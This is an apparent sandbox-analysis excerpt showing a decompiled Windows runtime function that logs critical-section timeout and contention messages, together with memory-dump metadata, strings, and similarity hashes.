                                        			E04CEFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                        				void* _t7;
                                        				intOrPtr _t9;
                                        				intOrPtr _t10;
                                        				intOrPtr* _t12;
                                        				intOrPtr* _t13;
                                        				intOrPtr _t14;
                                        				intOrPtr* _t15;
                                        
                                        				_t13 = __edx;
                                        				_push(_a4);
                                        				_t14 =  *[fs:0x18];
                                        				_t15 = _t12;
                                        				_t7 = E04C9CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                        				_push(_t13);
                                        				E04CE5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                        				_t9 =  *_t15;
                                        				if(_t9 == 0xffffffff) {
                                        					_t10 = 0;
                                        				} else {
                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                        				}
                                        				_push(_t10);
                                        				_push(_t15);
                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                        				return E04CE5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                        			}











                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CEFDFA
                                        Strings
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04CEFE01
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04CEFE2B
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                        • API String ID: 885266447-3903918235
                                        • Opcode ID: 2241583ee3ef95f7ac0792f359c092e303e9ed1768c30b2e9ff70e751a48c32d
                                        • Instruction ID: 72200b6b1b2b721bf49cd3e87f3f5bd567d2f4d7ad4b847aa784d19894352b88
                                        • Opcode Fuzzy Hash: 2241583ee3ef95f7ac0792f359c092e303e9ed1768c30b2e9ff70e751a48c32d
                                        • Instruction Fuzzy Hash: 4BF0F676200201BFEA201A86DC06F33BB6BEB84774F140358F628561D1EA62FC3096F4
                                        Uniqueness

                                        Uniqueness Score: -1.00%